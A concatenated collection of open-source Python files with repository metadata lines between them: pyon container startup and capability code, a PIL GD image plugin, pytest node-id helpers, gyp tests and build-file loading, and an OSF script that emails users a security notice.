        self.name = "cc_agent_%s" % self.id

        # Register this instance as the process-wide singleton.
        bootstrap.container_instance = self
        Container.instance = self
        self.container = self  # Make self appear as process to service clients
        self.CCAP = CCAP
        self.CFG = CFG

        log.debug("Container (sysname=%s) initializing ..." % bootstrap.get_sys_name())

        # Keep track of the overrides from the command-line, so they can trump app/rel file data
        self.spawn_args = kwargs

        # Greenlet context-local storage
        self.context = LocalContextMixin()

        # Load general capabilities file and augment with specific profile
        self._load_capabilities()

        # Start the capabilities
        start_order = self.cap_profile['start_order']
        for cap in start_order:
            if cap not in self._cap_definitions:
                raise ContainerError("CC capability %s not defined in profile" % cap)
            if cap in self._capabilities or cap in self._cap_instances:
                raise ContainerError("CC capability %s already initialized" % cap)
            try:
                cap_def = self._cap_definitions[cap]
                log.debug("__init__(): Initializing '%s'" % cap)
                cap_obj = named_any(cap_def['class'])(container=self)
                self._cap_instances[cap] = cap_obj
                # Dependencies must have been initialized earlier in start_order.
                if 'depends_on' in cap_def and cap_def['depends_on']:
                    dep_list = cap_def['depends_on'].split(',')
                    for dep in dep_list:
                        dep = dep.strip()
                        if dep not in self._cap_initialized:
                            raise ContainerError("CC capability %s dependent on non-existing capability %s" % (cap, dep))
                # Optionally expose the capability instance as a container attribute.
                if 'field' in cap_def and cap_def['field']:
                    setattr(self, cap_def['field'], cap_obj)
                self._cap_initialized.append(cap)
            except Exception as ex:
                log.error("Container Capability %s init error: %s" % (cap, ex))
                raise

        log.debug("Container initialized, OK.")

    def _load_capabilities(self):
        """Load capability definitions from YAML and overlay the configured
        profile; (re)populate the module-level CCAP constants."""
        self._cap_initialized = []  # List of capability constants initialized in container
        self._capabilities = []     # List of capability constants active in container
        self._cap_instances = {}    # Dict mapping capability->manager instance

        self._cap_definitions = Config(["res/config/container_capabilities.yml"]).data['capabilities']

        profile_filename = CFG.get_safe("container.profile", "development")
        if not profile_filename.endswith(".yml"):
            profile_filename = "res/profile/%s.yml" % profile_filename
        log.debug("Loading CC capability profile from file: %s", profile_filename)
        profile_cfg = Config([profile_filename]).data
        if not isinstance(profile_cfg, dict) or profile_cfg['type'] != "profile" or not "profile" in profile_cfg:
            raise ContainerError("Container capability profile invalid: %s" % profile_filename)

        self.cap_profile = profile_cfg['profile']

        if "capabilities" in self.cap_profile and self.cap_profile['capabilities']:
            dict_merge(self._cap_definitions, self.cap_profile['capabilities'], True)

        CCAP.clear()
        cap_list = self._cap_definitions.keys()
        CCAP.update(zip(cap_list, cap_list))

        if "config" in self.cap_profile and self.cap_profile['config']:
            log.info("Container CFG was changed based on profile: %s", profile_filename)
        # Note: The config update actually happens in pycc.py early on

    def start(self):
        """Start all enabled capabilities in profile order, publish the
        lifecycle event and mark the container RUNNING."""
        log.debug("Container starting...")
        if self._is_started:
            raise ContainerError("Container already started")

        start_order = self.cap_profile['start_order']
        for cap in start_order:
            if cap not in self._cap_instances:
                continue
            # First find the default enabled value if no CFG key exists
            enabled_default = self._cap_definitions.get_safe("%s.enabled_default" % cap, True)
            # Then find CFG key where enabled flag is (default or override)
            enabled_config = self._cap_definitions.get_safe("%s.enabled_config" % cap, "container.%s.enabled" % cap)
            # Then determine the enabled value
            enabled = CFG.get_safe(enabled_config, enabled_default)
            if enabled:
                log.debug("start(): Starting '%s'" % cap)
                try:
                    cap_obj = self._cap_instances[cap]
                    cap_obj.start()
                    self._capabilities.append(cap)
                except Exception as ex:
                    log.error("Container Capability %s start error: %s" % (cap, ex))
                    raise
            else:
                log.debug("start(): Capability '%s' disabled by config '%s'", cap, enabled_config)

        if self.has_capability(CCAP.EVENT_PUBLISHER):
            self.event_pub.publish_event(event_type="ContainerLifecycleEvent",
                                         origin=self.id, origin_type="CapabilityContainer",
                                         sub_type="START",
                                         state=ContainerStateEnum.START)

        self._is_started = True
        self._status = RUNNING

        log.info("Container (%s) started, OK.", self.id)

    def has_capability(self, capability):
        """
        Returns True if the given capability is in the list of container capabilities,
        i.e. available in this container.
        """
        return capability in self._capabilities

    @property
    def node(self):
        """
        Returns the active/default Node that should be used for most communication in the system.
        Defers to exchange manager, but only if it has been started, otherwise returns None.
        """
        if self.has_capability(CCAP.EXCHANGE_MANAGER):
            return self.ex_manager.default_node
        return None

    @contextmanager
    def _push_status(self, new_status):
        """
        Temporarily sets the internal status flag.
        Use this as a decorator or in a with-statement before calling a temporary status changing
        method, like start_rel_from_url.
        """
        curstatus = self._status
        self._status = new_status
        try:
            yield
        finally:
            self._status = curstatus

    def serve_forever(self):
        """ Run the container until killed. """
        log.debug("In Container.serve_forever")

        if not self.proc_manager.proc_sup.running:
            self.start()

        # Exit if immediate==True and children len is ok
        num_procs = len(self.proc_manager.proc_sup.children)
        immediate = CFG.system.get('immediate', False)
        if immediate and num_procs == 1:  # only spawned greenlet is the CC-Agent
            log.debug("Container.serve_forever exiting due to CFG.system.immediate")
        else:
            # print a warning just in case
            if immediate and num_procs != 1:
                log.warn("CFG.system.immediate=True but number of spawned processes is not 1 (%d)", num_procs)
            try:
                # This just waits in this Greenlet for all child processes to complete,
                # which is triggered somewhere else.
                self.proc_manager.proc_sup.join_children()
            except (KeyboardInterrupt, SystemExit) as ex:
                if hasattr(self, 'gl_parent_watch') and self.gl_parent_watch is not None:
                    # Remove the greenlet that watches the parent process
                    self.gl_parent_watch.kill()
                # Let the caller handle this
                raise
            except:
                # NOTE(review): bare except also swallows GreenletExit; kept as-is.
                log.exception('Unhandled error! Forcing container shutdown')

    def status(self):
        """
        Returns the internal status.
        """
        return self._status

    def is_running(self):
        """
        Is the container fully started and currently running.
        """
        if self._status == RUNNING:
            return True
        return False

    def is_terminating(self):
        """
        Is the container in the process of shutting down or stopped.
        """
        if self._status == TERMINATING or self._status == TERMINATED:
            return True
        return False

    def _cleanup_pid(self):
        """Best-effort removal of the container's pidfile (idempotent)."""
        if self.pidfile:
            log.debug("Cleanup pidfile: %s", self.pidfile)
            try:
                os.remove(self.pidfile)
            except Exception as e:
                log.warn("Pidfile could not be deleted: %s" % str(e))
            self.pidfile = None

    def stop(self):
        """Stop all active capabilities in reverse start order and clear the
        container singleton. Errors during individual stops are logged, not raised."""
        log.info("=============== Container stopping... ===============")
        self._status = TERMINATING

        if self.has_capability(CCAP.EVENT_PUBLISHER) and self.event_pub is not None:
            try:
                self.event_pub.publish_event(event_type="ContainerLifecycleEvent",
                                             origin=self.id, origin_type="CapabilityContainer",
                                             sub_type="TERMINATE",
                                             state=ContainerStateEnum.TERMINATE)
            except Exception as ex:
                log.exception(ex)

        while self._capabilities:
            capability = self._capabilities.pop()
            #log.debug("stop(): Stopping '%s'" % capability)
            try:
                cap_obj = self._cap_instances[capability]
                cap_obj.stop()
                del self._cap_instances[capability]
            except Exception as ex:
                log.exception("Container stop(): Error stop %s" % capability)

        Container.instance = None
        from pyon.core import bootstrap
        bootstrap.container_instance = None

        self._is_started = False
        self._status = TERMINATED
        log.info("Container stopped.")

    def start_app(self, appdef=None, config=None):
        """Start a single app (delegates to the app manager)."""
        with self._push_status("START_APP"):
            return self.app_manager.start_app(appdef=appdef, config=config)

    def start_app_from_url(self, app_url=''):
        """Start a single app from an app definition file."""
        with self._push_status("START_APP_FROM_URL"):
            return self.app_manager.start_app_from_url(app_url=app_url)

    def start_rel(self, rel=None):
        """Start a deploy (rel) definition."""
        with self._push_status("START_REL"):
            return self.app_manager.start_rel(rel=rel)

    def start_rel_from_url(self, rel_url='', config=None):
        """Start a deploy (rel) definition from a file/URL."""
        with self._push_status("START_REL_FROM_URL"):
            return self.app_manager.start_rel_from_url(rel_url=rel_url, config=config)

    def fail_fast(self, err_msg="", skip_stop=False):
        """
        Container needs to shut down and NOW.
        """
        log.error("Fail Fast: %s", err_msg)
        if not skip_stop:
            self.stop()
        log.error("Fail Fast: killing container")
        traceback.print_exc()

        self._kill_fast()

    def _kill_fast(self):
        # The exit code of the terminated process is set to non-zero
        os.kill(os.getpid(), signal.SIGTERM)
class PidfileCapability(ContainerCapability):
    """Enforces one container per UNIX process via a pidfile that also
    advertises the agent's messaging coordinates."""

    def start(self):
        # Check if this UNIX process already runs a Container.
        self.container.pidfile = "cc-pid-%d" % os.getpid()
        if os.path.exists(self.container.pidfile):
            raise ContainerError("Container.on_start(): Container is a singleton per UNIX process. Existing pid file found: %s" % self.container.pidfile)

        # write out a PID file containing our agent messaging name
        with open(self.container.pidfile, 'w') as f:
            pid_contents = {'messaging': dict(CFG.server.amqp),
                            'container-agent': self.container.name,
                            'container-xp': bootstrap.get_sys_name()}
            f.write(msgpack.dumps(pid_contents))
        # Ensure the pidfile is removed even on abnormal interpreter exit.
        atexit.register(self.container._cleanup_pid)

    def stop(self):
        self.container._cleanup_pid()
class SignalHandlerCapability(ContainerCapability):
    """Installs gevent signal handlers: SIGTERM for orderly shutdown and
    SIGUSR2 for greenlet debugging dumps."""

    def start(self):
        def handle_sigterm():
            """Handles SIGTERM, initiating orderly Python exit handling,
            allowing the container to shutdown.
            Notes:
            - Without this handler, the process is immediately terminated on SIGTERM
            - Gevent has signal handling, so must use gevent version or chain
            """
            try:
                log.info("In TERM signal handler, triggering exit")
                self.container._cleanup_pid()    # cleanup the pidfile first
            finally:
                # This will raise SystemExit in serve_forever and IPython cores
                # Thereby pycc will be able to shutdown the container
                sys.exit(signal.SIGTERM)

        # Set up SIGTERM handler
        gevent.signal(signal.SIGTERM, handle_sigterm)

        def handle_sigusr2():
            """Handles SIGUSR2, prints debugging greenlet information.
            Output goes to stderr and to a "gls-<pid>" file.
            """
            gls = GreenletLeak.get_greenlets()

            allgls = []

            for gl in gls:
                status = GreenletLeak.format_greenlet(gl)

                # build formatted output:
                # Greenlet at 0xdeadbeef
                #     self: <EndpointUnit at 0x1ffcceef>
                #     func: bound, EndpointUnit.some_func
                status[0].insert(0, "%s at %s:" % (gl.__class__.__name__, hex(id(gl))))

                # indent anything in status a second time
                prefmt = [s.replace("\t", "\t\t") for s in status[0]]
                prefmt.append("traceback:")

                for line in status[1]:
                    # keep only the first two lines of each traceback entry
                    for subline in line.split("\n")[0:2]:
                        prefmt.append(subline)

                glstr = "\n\t".join(prefmt)
                allgls.append(glstr)

            # print it out!
            print >>sys.stderr, "\n\n".join(allgls)
            with open("gls-%s" % os.getpid(), "w") as f:
                f.write("\n\n".join(allgls))

        # Set up greenlet debugging signal handler
        gevent.signal(signal.SIGUSR2, handle_sigusr2)
class EventPublisherCapability(ContainerCapability):
    """Provides container.event_pub, the container-wide EventPublisher."""

    def __init__(self, container):
        ContainerCapability.__init__(self, container)
        self.container.event_pub = None

    def start(self):
        self.container.event_pub = EventPublisher()

    def stop(self):
        self.container.event_pub.close()
class ObjectStoreCapability(ContainerCapability):
    """Provides container.object_store, backed by pyon's ObjectStore."""

    def __init__(self, container):
        ContainerCapability.__init__(self, container)
        self.container.object_store = None

    def start(self):
        # Local import avoids loading the datastore machinery unless enabled.
        from pyon.ion.objstore import ObjectStore
        self.container.object_store = ObjectStore()

    def stop(self):
        self.container.object_store.close()
        self.container.object_store = None
class LocalRouterCapability(ContainerCapability):
    """Provides container.local_router for in-process message transport."""

    def __init__(self, container):
        ContainerCapability.__init__(self, container)
        self.container.local_router = None

    def start(self):
        # internal router for local transports
        self.container.local_router = LocalRouter(bootstrap.get_sys_name())
        self.container.local_router.start()
        # Give the router a moment to come up before proceeding.
        self.container.local_router.ready.wait(timeout=2)

    def stop(self):
        self.container.local_router.stop()
class ContainerAgentCapability(ContainerCapability):
    """Spawns the CC-Agent RPC endpoint so the container can be addressed
    as an ION process."""

    def start(self):
        # Start the CC-Agent API
        listen_name = self.container.create_xn_process(self.container.name)
        rsvc = ProcessRPCServer(from_name=listen_name, service=self.container, process=self.container)

        # Start an ION process with the right kind of endpoint factory
        proc = self.container.proc_manager.proc_sup.spawn(name=self.container.name, listeners=[rsvc], service=self.container)
        self.container.proc_manager.proc_sup.ensure_ready(proc)
        proc.start_listeners()

    def stop(self):
        pass
class FileSystemCapability(ContainerCapability):
    """Provides container.file_system; created eagerly at init time since it
    needs no start/stop lifecycle."""

    def __init__(self, container):
        ContainerCapability.__init__(self, container)
        self.container.file_system = FileSystem(CFG)
| bsd-2-clause |
KAMI911/loec | examples/Sharpen/binaries-windows-python26/GdImageFile.py | 3 | 2265 | #
# The Python Imaging Library.
# $Id: GdImageFile.py 2134 2004-10-06 08:55:20Z fredrik $
#
# GD file handling
#
# History:
# 1996-04-12 fl Created
#
# Copyright (c) 1997 by Secret Labs AB.
# Copyright (c) 1996 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
# NOTE: This format cannot be automatically recognized, so the
# class is not registered for use with Image.open(). To open a
# gd file, use the GdImageFile.open() function instead.
# THE GD FORMAT IS NOT DESIGNED FOR DATA INTERCHANGE. This
# implementation is provided for convenience and demonstrational
# purposes only.
__version__ = "0.1"
import string
import Image, ImageFile, ImagePalette
def i16(c):
    """Read a big-endian unsigned 16-bit integer from the first two bytes of *c*."""
    return (ord(c[0]) << 8) | ord(c[1])
##
# Image plugin for the GD uncompressed format. Note that this format
# is not supported by the standard <b>Image.open</b> function. To use
# this plugin, you have to import the <b>GdImageFile</b> module and
# use the <b>GdImageFile.open</b> function.
class GdImageFile(ImageFile.ImageFile):
    """Image plugin for the GD uncompressed format (see module notes: not
    registered with Image.open(); use GdImageFile.open() instead)."""

    format = "GD"
    format_description = "GD uncompressed images"

    def _open(self):

        # Header: 775 bytes = size/flags fields followed by the palette.
        s = self.fp.read(775)

        self.mode = "L" # FIXME: "P"
        # Big-endian 16-bit width and height.
        self.size = i16(s[0:2]), i16(s[2:4])

        # transparency index
        tindex = i16(s[5:7])
        if tindex < 256:
            self.info["transparent"] = tindex

        self.palette = ImagePalette.raw("RGB", s[7:])

        # Raw pixel data starts right after the 775-byte header.
        self.tile = [("raw", (0,0)+self.size, 775, ("L", 0, -1))]
##
# Load texture from a GD image file.
#
# @param filename GD file name, or an opened file handle.
# @param mode Optional mode. In this version, if the mode argument
# is given, it must be "r".
# @return An image instance.
# @exception IOError If the image could not be read.
def open(fp, mode = "r"):
    """Load a texture from a GD image file.

    *fp* may be a file name or an opened file handle; *mode*, if given,
    must be "r".  Returns an image instance or raises IOError if the
    image could not be read.
    """
    if mode != "r":
        raise ValueError("bad mode")

    # Accept either a filename string or an already-open binary file.
    # (Python 2 only: __builtin__.open avoids shadowing by this function.)
    if type(fp) == type(""):
        import __builtin__
        filename = fp
        fp = __builtin__.open(fp, "rb")
    else:
        filename = ""

    try:
        return GdImageFile(fp, filename)
    except SyntaxError:
        # PIL plugins signal "not my format" via SyntaxError.
        raise IOError("cannot identify this image file")
| gpl-3.0 |
rmfitzpatrick/pytest | _pytest/nodes.py | 38 | 1211 | SEP = "/"
def _splitnode(nodeid):
"""Split a nodeid into constituent 'parts'.
Node IDs are strings, and can be things like:
''
'testing/code'
'testing/code/test_excinfo.py'
'testing/code/test_excinfo.py::TestFormattedExcinfo::()'
Return values are lists e.g.
[]
['testing', 'code']
['testing', 'code', 'test_excinfo.py']
['testing', 'code', 'test_excinfo.py', 'TestFormattedExcinfo', '()']
"""
if nodeid == '':
# If there is no root node at all, return an empty list so the caller's logic can remain sane
return []
parts = nodeid.split(SEP)
# Replace single last element 'test_foo.py::Bar::()' with multiple elements 'test_foo.py', 'Bar', '()'
parts[-1:] = parts[-1].split("::")
return parts
def ischildnode(baseid, nodeid):
"""Return True if the nodeid is a child node of the baseid.
E.g. 'foo/bar::Baz::()' is a child of 'foo', 'foo/bar' and 'foo/bar::Baz', but not of 'foo/blorp'
"""
base_parts = _splitnode(baseid)
node_parts = _splitnode(nodeid)
if len(node_parts) < len(base_parts):
return False
return node_parts[:len(base_parts)] == base_parts
| mit |
al1221/ghost-openshift | core/client/node_modules/ember-cli/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/common_test.py | 2542 | 1970 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for the common.py file."""
import gyp.common
import unittest
import sys
class TestTopologicallySorted(unittest.TestCase):
    def test_Valid(self):
        """Test that sorting works on a valid graph with one possible order."""
        # Adjacency list: node -> nodes it depends on.
        graph = {
            'a': ['b', 'c'],
            'b': [],
            'c': ['d'],
            'd': ['b'],
        }
        # Edge accessor handed to TopologicallySorted.
        def GetEdge(node):
            return tuple(graph[node])
        self.assertEqual(
            gyp.common.TopologicallySorted(graph.keys(), GetEdge),
            ['a', 'c', 'd', 'b'])

    def test_Cycle(self):
        """Test that an exception is thrown on a cyclic graph."""
        # a -> b -> c -> d -> a forms a cycle.
        graph = {
            'a': ['b'],
            'b': ['c'],
            'c': ['d'],
            'd': ['a'],
        }
        def GetEdge(node):
            return tuple(graph[node])
        self.assertRaises(
            gyp.common.CycleError, gyp.common.TopologicallySorted,
            graph.keys(), GetEdge)
class TestGetFlavor(unittest.TestCase):
    """Test that gyp.common.GetFlavor works as intended"""
    original_platform = ''

    def setUp(self):
        # Remember the real platform so each test can fake sys.platform safely.
        self.original_platform = sys.platform

    def tearDown(self):
        sys.platform = self.original_platform

    def assertFlavor(self, expected, argument, param):
        """Assert GetFlavor(param) == expected while sys.platform is *argument*."""
        sys.platform = argument
        self.assertEqual(expected, gyp.common.GetFlavor(param))

    def test_platform_default(self):
        """Flavors derived purely from sys.platform (no params)."""
        # Fixed: removed the stray trailing semicolons on the assertions below.
        self.assertFlavor('freebsd', 'freebsd9', {})
        self.assertFlavor('freebsd', 'freebsd10', {})
        self.assertFlavor('openbsd', 'openbsd5', {})
        self.assertFlavor('solaris', 'sunos5', {})
        self.assertFlavor('solaris', 'sunos', {})
        self.assertFlavor('linux', 'linux2', {})
        self.assertFlavor('linux', 'linux3', {})

    def test_param(self):
        """An explicit 'flavor' parameter overrides sys.platform."""
        self.assertFlavor('foobar', 'linux2', {'flavor': 'foobar'})
# Allow running this test file directly: python common_test.py
if __name__ == '__main__':
    unittest.main()
| mit |
hmoco/osf.io | scripts/admin_permission_email.py | 9 | 3429 | #!/usr/bin/env python
# encoding: utf-8
import logging
import datetime
from django.utils import timezone
from modularodm import Q
from framework.email.tasks import send_email
from website import mails
from website import models
from website import settings
from website.app import init_app
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)

# Sender address for the notice and the key recorded per-user in
# user.security_messages to avoid double-sending.
FROM_ADDR = 'OSF Support <support@osf.io>'
MESSAGE_NAME = 'permissions_change'
SECURITY_MESSAGE = mails.Mail(
    'security_permissions_change',
    subject='OSF Privacy Notice',
)
def send_security_message(user, label, mail):
    """Send *mail* to *user* once; record *label* so it is never re-sent."""
    # Idempotence: skip users who already received this message.
    if label in user.security_messages:
        return
    # Pass mailer so that celery is not used
    # Email synchronously so that user is only saved after email has been sent
    mails.send_mail(
        user.username,
        mail,
        from_addr=FROM_ADDR,
        mailer=send_email,
        user=user,
        username=settings.MANDRILL_USERNAME,
        password=settings.MANDRILL_PASSWORD,
        mail_server=settings.MANDRILL_MAIL_SERVER,
    )
    user.security_messages[label] = timezone.now()
    user.save()
def get_targets():
    """Return confirmed, active, registered users who have not yet
    received this security message."""
    # Active users who have not received the email
    query = (
        Q('security_messages.{0}'.format(MESSAGE_NAME), 'exists', False) &
        Q('is_registered', 'eq', True) &
        Q('password', 'ne', None) &
        Q('is_merged', 'ne', True) &
        Q('is_disabled', 'ne', True) &
        Q('date_confirmed', 'ne', None)
    )
    return models.User.find(query)
def main(dry_run):
    """Send the security notice to all targets; only log when dry_run."""
    users = get_targets()
    for user in users:
        logger.info('Sending message to user {0!r}'.format(user))
        if not dry_run:
            send_security_message(user, MESSAGE_NAME, SECURITY_MESSAGE)
if __name__ == '__main__':
    import sys
    script_utils.add_file_logger(logger, __file__)
    # Pass 'dry' on the command line to log without sending.
    dry_run = 'dry' in sys.argv
    init_app(set_backends=True, routes=False)
    main(dry_run=dry_run)
import mock
from nose.tools import * # noqa
from tests.base import OsfTestCase
from tests.factories import UserFactory
class TestSendSecurityMessage(OsfTestCase):
    """Tests for this script (kept in-file); they hit the test database
    and mock out the actual email sending."""

    def tearDown(self):
        super(TestSendSecurityMessage, self).tearDown()
        # Remove users created by the factories so tests stay independent.
        models.User.remove()

    def test_get_targets(self):
        users = [UserFactory() for _ in range(3)]
        # Mark one user as already notified; it must be excluded.
        users[0].security_messages[MESSAGE_NAME] = timezone.now()
        users[0].save()
        targets = get_targets()
        assert_equal(set(targets), set(users[1:]))

    @mock.patch('scripts.admin_permission_email.send_email')
    def test_send_mail(self, mock_send_mail):
        user = UserFactory()
        send_security_message(user, MESSAGE_NAME, SECURITY_MESSAGE)
        user.reload()
        assert_in(MESSAGE_NAME, user.security_messages)

    @mock.patch('scripts.admin_permission_email.send_email')
    def test_main(self, mock_send_mail):
        [UserFactory() for _ in range(3)]
        assert_equal(len(get_targets()), 3)
        main(dry_run=False)
        assert_true(mock_send_mail.called)
        # All users are now marked, so no targets remain.
        assert_equal(len(get_targets()), 0)

    @mock.patch('scripts.admin_permission_email.send_email')
    def test_main_dry(self, mock_send_mail):
        [UserFactory() for _ in range(3)]
        assert_equal(len(get_targets()), 3)
        main(dry_run=True)
        # Dry run: nothing sent, nothing marked.
        assert_false(mock_send_mail.called)
        assert_equal(len(get_targets()), 3)
| apache-2.0 |
masterpowers/angular-laravel | node_modules/laravel-elixir/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/input.py | 457 | 112827 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from compiler.ast import Const
from compiler.ast import Dict
from compiler.ast import Discard
from compiler.ast import List
from compiler.ast import Module
from compiler.ast import Node
from compiler.ast import Stmt
import compiler
import copy
import gyp.common
import multiprocessing
import optparse
import os.path
import re
import shlex
import signal
import subprocess
import sys
import threading
import time
import traceback
from gyp.common import GypError
# A list of types that are treated as linkable.
linkable_types = ['executable', 'shared_library', 'loadable_module']

# A list of sections that contain links to other targets.
dependency_sections = ['dependencies', 'export_dependent_settings']

# base_path_sections is a list of sections defined by GYP that contain
# pathnames.  The generators can provide more keys, the two lists are merged
# into path_sections, but you should call IsPathSection instead of using either
# list directly.
base_path_sections = [
    'destination',
    'files',
    'include_dirs',
    'inputs',
    'libraries',
    'outputs',
    'sources',
]
path_sections = []

# Merge-operator characters that may trail a section name; the regex matches
# conventional pathname-bearing key names like foo_dir / foo_files / foo_path.
is_path_section_charset = set('=+?!')
is_path_section_match_re = re.compile('_(dir|file|path)s?$')


def IsPathSection(section):
    """Return true-ish if *section* names a section containing pathnames.

    Trailing merge-operator characters ('=+?!') apply a section to its base
    name and are stripped first; '/' is notably absent from that set because
    there's no way for a regular expression suffix to be treated as a path.
    """
    section = section.rstrip('=+?!')
    return section in path_sections or is_path_section_match_re.search(section)
# base_non_configuration_keys is a list of key names that belong in the target
# itself and should not be propagated into its configurations.  It is merged
# with a list that can come from the generator to
# create non_configuration_keys.
base_non_configuration_keys = [
    # Sections that must exist inside targets and not configurations.
    'actions',
    'configurations',
    'copies',
    'default_configuration',
    'dependencies',
    'dependencies_original',
    'libraries',
    'postbuilds',
    'product_dir',
    'product_extension',
    'product_name',
    'product_prefix',
    'rules',
    'run_as',
    'sources',
    'standalone_static_library',
    'suppress_wildcard',
    'target_name',
    'toolset',
    'toolsets',
    'type',

    # Sections that can be found inside targets or configurations, but that
    # should not be propagated from targets into their configurations.
    'variables',
]
# Populated later by merging base_non_configuration_keys with generator keys.
non_configuration_keys = []

# Keys that do not belong inside a configuration dictionary.
invalid_configuration_keys = [
    'actions',
    'all_dependent_settings',
    'configurations',
    'dependencies',
    'direct_dependent_settings',
    'libraries',
    'link_settings',
    'sources',
    'standalone_static_library',
    'target_name',
    'type',
]

# Controls whether or not the generator supports multiple toolsets.
multiple_toolsets = False

# Paths for converting filelist paths to output paths: {
#   toplevel,
#   qualified_output_dir,
# }
generator_filelist_paths = None
def GetIncludedBuildFiles(build_file_path, aux_data, included=None):
  """Return a list of all build files included into build_file_path.

  The returned list will contain build_file_path as well as all other files
  that it included, either directly or indirectly.  Note that the list may
  contain files that were included into a conditional section that evaluated
  to false and was not merged into build_file_path's dict.

  aux_data is a dict containing a key for each build file or included build
  file.  Those keys provide access to dicts whose "included" keys contain
  lists of all other files included by the build file.

  included should be left at its default None value by external callers.  It
  is used for recursion.

  The returned list will not contain any duplicate entries.  Each build file
  in the list will be relative to the current directory.
  """
  # Fixed: compare against None with identity ('is'), not equality ('== None').
  if included is None:
    included = []

  # Already visited: stop so mutual/duplicate includes don't recurse forever.
  if build_file_path in included:
    return included

  included.append(build_file_path)

  for included_build_file in aux_data[build_file_path].get('included', []):
    GetIncludedBuildFiles(included_build_file, aux_data, included)

  return included
def CheckedEval(file_contents):
  """Return the eval of a gyp file.

  The gyp file is restricted to dictionaries and lists only, and
  repeated keys are not allowed.

  Note that this is slower than eval() is.
  """

  # Parse with the Python 2 'compiler' module and validate the overall
  # shape of the AST before converting it to plain data.
  ast = compiler.parse(file_contents)
  assert isinstance(ast, Module)
  c1 = ast.getChildren()
  # First slot of a Module's children is its doc attribute; a gyp file has
  # none, so it must be None.
  assert c1[0] is None
  assert isinstance(c1[1], Stmt)
  c2 = c1[1].getChildren()
  # The file must consist of exactly one bare expression (a Discard node).
  assert isinstance(c2[0], Discard)
  c3 = c2[0].getChildren()
  assert len(c3) == 1
  # Recursively convert the expression into dicts/lists/constants, raising
  # on anything else or on duplicate dict keys.
  return CheckNode(c3[0], [])
def CheckNode(node, keypath):
  """Convert a 'compiler'-module AST node into plain Python data.

  Only dict literals, list literals, and constants are allowed.  keypath is
  the list of keys/indices that leads to |node|, used for error reporting.
  Raises GypError when a dict key is repeated, and TypeError for any node
  type other than Dict, List, or Const.
  """
  if isinstance(node, Dict):
    c = node.getChildren()
    # NOTE: intentionally shadows the 'dict' builtin for this scope.
    dict = {}
    # getChildren() interleaves key and value nodes; walk them in pairs.
    for n in range(0, len(c), 2):
      assert isinstance(c[n], Const)
      key = c[n].getChildren()[0]
      if key in dict:
        raise GypError("Key '" + key + "' repeated at level " +
                       repr(len(keypath) + 1) + " with key path '" +
                       '.'.join(keypath) + "'")
      kp = list(keypath)  # Make a copy of the list for descending this node.
      kp.append(key)
      dict[key] = CheckNode(c[n + 1], kp)
    return dict
  elif isinstance(node, List):
    c = node.getChildren()
    children = []
    for index, child in enumerate(c):
      kp = list(keypath)  # Copy list.
      kp.append(repr(index))
      children.append(CheckNode(child, kp))
    return children
  elif isinstance(node, Const):
    return node.getChildren()[0]
  else:
    raise TypeError, "Unknown AST node at key path '" + '.'.join(keypath) + \
        "': " + repr(node)
def LoadOneBuildFile(build_file_path, data, aux_data, variables, includes,
                     is_target, check):
  """Load a single .gyp/.gypi file into a dict, memoizing it in |data|.

  The file's contents are evaluated as a Python expression (via CheckedEval
  when |check| is true, plain eval otherwise) and must produce a dict.  Any
  'includes' are resolved and merged in unless the file sets a truthy
  'skip_includes'.  aux_data[build_file_path] records which files were
  included.  Returns the (possibly cached) dict for build_file_path.

  Raises GypError if the file is missing or does not evaluate to a dict.
  """
  # Memoized from a previous call: return the same dict object.
  if build_file_path in data:
    return data[build_file_path]

  if os.path.exists(build_file_path):
    # Close the file handle explicitly instead of leaking it until GC.
    build_file = open(build_file_path)
    try:
      build_file_contents = build_file.read()
    finally:
      build_file.close()
  else:
    raise GypError("%s not found (cwd: %s)" % (build_file_path, os.getcwd()))

  build_file_data = None
  try:
    if check:
      build_file_data = CheckedEval(build_file_contents)
    else:
      # NOTE: gyp files are trusted input; eval is intentional.  The empty
      # __builtins__ only limits accidents, not malice.
      build_file_data = eval(build_file_contents, {'__builtins__': None},
                             None)
  except SyntaxError as e:
    e.filename = build_file_path
    raise
  except Exception as e:
    gyp.common.ExceptionAppend(e, 'while reading ' + build_file_path)
    raise

  if not isinstance(build_file_data, dict):
    raise GypError("%s does not evaluate to a dictionary." % build_file_path)

  data[build_file_path] = build_file_data
  aux_data[build_file_path] = {}

  # Scan for includes and merge them in.
  if ('skip_includes' not in build_file_data or
      not build_file_data['skip_includes']):
    try:
      if is_target:
        LoadBuildFileIncludesIntoDict(build_file_data, build_file_path, data,
                                      aux_data, variables, includes, check)
      else:
        # Non-target files never receive extra |includes| from the caller.
        LoadBuildFileIncludesIntoDict(build_file_data, build_file_path, data,
                                      aux_data, variables, None, check)
    except Exception as e:
      gyp.common.ExceptionAppend(e,
                                 'while reading includes of ' +
                                 build_file_path)
      raise

  return build_file_data
def LoadBuildFileIncludesIntoDict(subdict, subdict_path, data, aux_data,
                                  variables, includes, check):
  """Merge included files into |subdict| in place, recursively.

  Files come from the caller-supplied |includes| list plus subdict's own
  'includes' key (entries resolved relative to subdict_path); each is loaded
  with LoadOneBuildFile and merged via MergeDicts, and is recorded in
  aux_data[subdict_path]['included'].  Afterwards, nested dicts and lists
  are walked so their 'includes' sections are processed too.
  """
  includes_list = []
  # 'is not None' rather than '!= None': identity test for the sentinel.
  if includes is not None:
    includes_list.extend(includes)

  if 'includes' in subdict:
    for include in subdict['includes']:
      # "include" is specified relative to subdict_path, so use the real
      # path to include by appending the provided "include" to the
      # directory in which subdict_path resides.
      relative_include = \
          os.path.normpath(os.path.join(os.path.dirname(subdict_path),
                                        include))
      includes_list.append(relative_include)
    # Unhook the includes list, it's no longer needed.
    del subdict['includes']

  # Merge in the included files.
  for include in includes_list:
    if not 'included' in aux_data[subdict_path]:
      aux_data[subdict_path]['included'] = []
    aux_data[subdict_path]['included'].append(include)

    gyp.DebugOutput(gyp.DEBUG_INCLUDES, "Loading Included File: '%s'", include)

    MergeDicts(subdict,
               LoadOneBuildFile(include, data, aux_data, variables, None,
                                False, check),
               subdict_path, include)

